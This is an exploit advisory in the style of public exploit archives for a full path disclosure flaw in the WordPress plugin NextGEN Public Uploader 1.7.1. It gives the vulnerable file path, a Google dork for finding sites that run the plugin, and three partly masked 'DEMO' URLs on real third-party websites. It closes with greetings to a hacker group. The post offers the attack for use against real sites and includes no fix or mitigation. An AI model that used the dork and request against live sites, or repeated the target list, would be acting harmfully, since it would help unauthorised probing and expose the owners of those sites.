# Exploit Title: Wordpress plugins- NextGEN Public Uploader Full Path Disclosure vulnerability # Date: 31/12/2012 # Author: Evil aXe # Software Link: http://wordpress.org/extend/plugins/nextgen-public-uploader/ # Version: 1.7.1 # Category : [ webapps ] # Dork:"inurl:nextgen-public-uploader" # Type : php # Tested on: [Windows] & [Ubuntu] ===================== Vulnerability : http://localhost/wp/wp-content/plugins/nextgen-public-uploader/nextgen-public-uploader.php ===================== ===================== DEMO : http://www.soonXXXXXXXXXXds.com/wp/wp-content/plugins/nextgen-public-uploader/nextgen-public-uploader.php http://www.ebXXXXXXXXXXXXXt.pk/wp-content/plugins/nextgen-public-uploader/nextgen-public-uploader.php http://www.pakiXXXXXXXXXXXXrt.com/wp-content/plugins/nextgen-public-uploader/nextgen-public-uploader.php ===================== #------------------ Contact: http://www.facebook.com/iChocolate.lips #------------------ ===================== # Greetz: R3x0Man, Shadman tanjim, Shahee Mirza, JingoBD, ManInDark And All Crew and Members of Bangladesh Cyber Army. =====================